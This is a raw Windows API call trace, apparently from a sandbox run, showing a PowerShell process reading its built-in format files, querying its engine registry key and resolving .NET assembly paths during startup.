	[0276.441] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0276.441] SetErrorMode (uMode=0x1) returned 0x1
	[0276.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0276.441] SetErrorMode (uMode=0x1) returned 0x1
	[0276.441] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0276.441] SetErrorMode (uMode=0x1) returned 0x1
	[0276.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0276.441] SetErrorMode (uMode=0x1) returned 0x1
	[0276.442] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0276.442] SetErrorMode (uMode=0x1) returned 0x1
	[0276.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0276.442] SetErrorMode (uMode=0x1) returned 0x1
	[0276.442] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0276.442] SetErrorMode (uMode=0x1) returned 0x1
	[0276.442] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0276.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.443] CoTaskMemFree (pv=0x24c3e0) 
	[0276.446] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0276.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.446] CoTaskMemFree (pv=0x24c3e0) 
	[0276.446] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0276.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.446] CoTaskMemFree (pv=0x24c3e0) 
	[0276.447] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0276.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.447] CoTaskMemFree (pv=0x24c3e0) 
	[0276.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.448] SetErrorMode (uMode=0x1) returned 0x1
	[0276.448] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0276.448] GetFileType (hFile=0x304) returned 0x1
	[0276.448] SetErrorMode (uMode=0x1) returned 0x1
	[0276.448] GetFileType (hFile=0x304) returned 0x1
	[0276.448] ReadFile (in: hFile=0x304, lpBuffer=0x335d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x335d278*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.449] ReadFile (in: hFile=0x304, lpBuffer=0x335d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x335d278*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.449] ReadFile (in: hFile=0x304, lpBuffer=0x335d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x335d278*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.449] ReadFile (in: hFile=0x304, lpBuffer=0x335d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x335d278*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.450] ReadFile (in: hFile=0x304, lpBuffer=0x335d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x335d278*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.450] ReadFile (in: hFile=0x304, lpBuffer=0x335d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x335d278*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.450] ReadFile (in: hFile=0x304, lpBuffer=0x335d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x335d278*, lpNumberOfBytesRead=0x12d098*=0x9e2, lpOverlapped=0x0) returned 1
	[0276.450] ReadFile (in: hFile=0x304, lpBuffer=0x335c7c2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x335c7c2*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0276.450] ReadFile (in: hFile=0x304, lpBuffer=0x335d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x335d278*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0276.451] CloseHandle (hObject=0x304) returned 1
	[0276.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.451] SetErrorMode (uMode=0x1) returned 0x1
	[0276.451] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d040 | out: lpFileInformation=0x12d040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0276.451] SetErrorMode (uMode=0x1) returned 0x1
	[0276.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.451] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d128 | out: phkResult=0x12d128*=0x304) returned 0x0
	[0276.451] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d0ac, lpData=0x0, lpcbData=0x12d0a8*=0x0 | out: lpType=0x12d0ac*=0x1, lpData=0x0, lpcbData=0x12d0a8*=0x56) returned 0x0
	[0276.451] CoTaskMemAlloc (cb=0x5a) returned 0x1b8a6fb0
	[0276.451] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d07c, lpData=0x1b8a6fb0, lpcbData=0x12d078*=0x56 | out: lpType=0x12d07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d078*=0x56) returned 0x0
	[0276.451] CoTaskMemFree (pv=0x1b8a6fb0) 
	[0276.452] RegCloseKey (hKey=0x304) returned 0x0
	[0276.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.462] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x29dad6a9, Data2=0xed95, Data3=0x443c, Data4=([0]=0xb4, [1]=0xa5, [2]=0xc8, [3]=0x19, [4]=0x94, [5]=0xfd, [6]=0x80, [7]=0xbf))) returned 0x0
	[0276.468] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x83a7cef5, Data2=0x201, Data3=0x4bda, Data4=([0]=0xb1, [1]=0x41, [2]=0xa, [3]=0xe8, [4]=0x92, [5]=0x6f, [6]=0x25, [7]=0x4c))) returned 0x0
	[0276.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.470] SetErrorMode (uMode=0x1) returned 0x1
	[0276.470] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0276.470] GetFileType (hFile=0x304) returned 0x1
	[0276.470] SetErrorMode (uMode=0x1) returned 0x1
	[0276.470] GetFileType (hFile=0x304) returned 0x1
	[0276.470] ReadFile (in: hFile=0x304, lpBuffer=0x3387de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3387de0*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.471] ReadFile (in: hFile=0x304, lpBuffer=0x3387de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3387de0*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.472] ReadFile (in: hFile=0x304, lpBuffer=0x3387de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3387de0*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.472] ReadFile (in: hFile=0x304, lpBuffer=0x3387de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3387de0*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.472] ReadFile (in: hFile=0x304, lpBuffer=0x3387de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3387de0*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.473] ReadFile (in: hFile=0x304, lpBuffer=0x3387de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3387de0*, lpNumberOfBytesRead=0x12d098*=0xfb2, lpOverlapped=0x0) returned 1
	[0276.473] ReadFile (in: hFile=0x304, lpBuffer=0x33874fa, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x33874fa*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0276.473] ReadFile (in: hFile=0x304, lpBuffer=0x3387de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x3387de0*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0276.473] CloseHandle (hObject=0x304) returned 1
	[0276.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.474] SetErrorMode (uMode=0x1) returned 0x1
	[0276.474] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d040 | out: lpFileInformation=0x12d040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0276.474] SetErrorMode (uMode=0x1) returned 0x1
	[0276.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.474] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d128 | out: phkResult=0x12d128*=0x304) returned 0x0
	[0276.474] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d0ac, lpData=0x0, lpcbData=0x12d0a8*=0x0 | out: lpType=0x12d0ac*=0x1, lpData=0x0, lpcbData=0x12d0a8*=0x56) returned 0x0
	[0276.474] CoTaskMemAlloc (cb=0x5a) returned 0x1b8a6fb0
	[0276.474] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d07c, lpData=0x1b8a6fb0, lpcbData=0x12d078*=0x56 | out: lpType=0x12d07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d078*=0x56) returned 0x0
	[0276.474] CoTaskMemFree (pv=0x1b8a6fb0) 
	[0276.474] RegCloseKey (hKey=0x304) returned 0x0
	[0276.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.476] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x19b10cf2, Data2=0x714d, Data3=0x4811, Data4=([0]=0x87, [1]=0xe6, [2]=0x3d, [3]=0x4e, [4]=0x70, [5]=0xea, [6]=0xb4, [7]=0x25))) returned 0x0
	[0276.478] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xc64f4016, Data2=0x449b, Data3=0x4482, Data4=([0]=0x8b, [1]=0x8c, [2]=0x13, [3]=0x2f, [4]=0x78, [5]=0x3a, [6]=0xaa, [7]=0xf4))) returned 0x0
	[0276.479] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x2371da43, Data2=0x7342, Data3=0x4c7f, Data4=([0]=0x94, [1]=0x90, [2]=0x9d, [3]=0xe1, [4]=0xda, [5]=0x7f, [6]=0x15, [7]=0x4d))) returned 0x0
	[0276.479] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x3ae25eb0, Data2=0x4512, Data3=0x4482, Data4=([0]=0x85, [1]=0x6a, [2]=0x9f, [3]=0x81, [4]=0x40, [5]=0x67, [6]=0xa7, [7]=0x3a))) returned 0x0
	[0276.480] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x5e1ff1b2, Data2=0xbde6, Data3=0x41e4, Data4=([0]=0x8f, [1]=0x23, [2]=0x4d, [3]=0xdb, [4]=0x93, [5]=0xc2, [6]=0xf7, [7]=0x94))) returned 0x0
	[0276.481] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xdefdd72a, Data2=0x2186, Data3=0x4acb, Data4=([0]=0xbb, [1]=0xa7, [2]=0xcf, [3]=0xbf, [4]=0x91, [5]=0x36, [6]=0x1e, [7]=0xf9))) returned 0x0
	[0276.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.482] SetErrorMode (uMode=0x1) returned 0x1
	[0276.997] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0276.997] GetFileType (hFile=0x304) returned 0x1
	[0276.997] SetErrorMode (uMode=0x1) returned 0x1
	[0276.997] GetFileType (hFile=0x304) returned 0x1
	[0276.998] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x33d3b40*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.998] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x33d3b40*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.998] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x33d3b40*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.999] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x33d3b40*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.999] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x33d3b40*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0276.999] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x33d3b40*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0277.000] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x33d3b40*, lpNumberOfBytesRead=0x12d098*=0xaca, lpOverlapped=0x0) returned 1
	[0277.000] ReadFile (in: hFile=0x304, lpBuffer=0x33d3172, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x33d3172*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0277.000] ReadFile (in: hFile=0x304, lpBuffer=0x33d3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x33d3b40*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0277.000] CloseHandle (hObject=0x304) returned 1
	[0277.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0277.000] SetErrorMode (uMode=0x1) returned 0x1
	[0277.000] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d040 | out: lpFileInformation=0x12d040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0277.000] SetErrorMode (uMode=0x1) returned 0x1
	[0277.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0277.001] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d128 | out: phkResult=0x12d128*=0x304) returned 0x0
	[0277.001] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d0ac, lpData=0x0, lpcbData=0x12d0a8*=0x0 | out: lpType=0x12d0ac*=0x1, lpData=0x0, lpcbData=0x12d0a8*=0x56) returned 0x0
	[0277.001] CoTaskMemAlloc (cb=0x5a) returned 0x1b8a6fb0
	[0277.001] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d07c, lpData=0x1b8a6fb0, lpcbData=0x12d078*=0x56 | out: lpType=0x12d07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d078*=0x56) returned 0x0
	[0277.001] CoTaskMemFree (pv=0x1b8a6fb0) 
	[0277.001] RegCloseKey (hKey=0x304) returned 0x0
	[0277.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0277.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0277.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0277.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
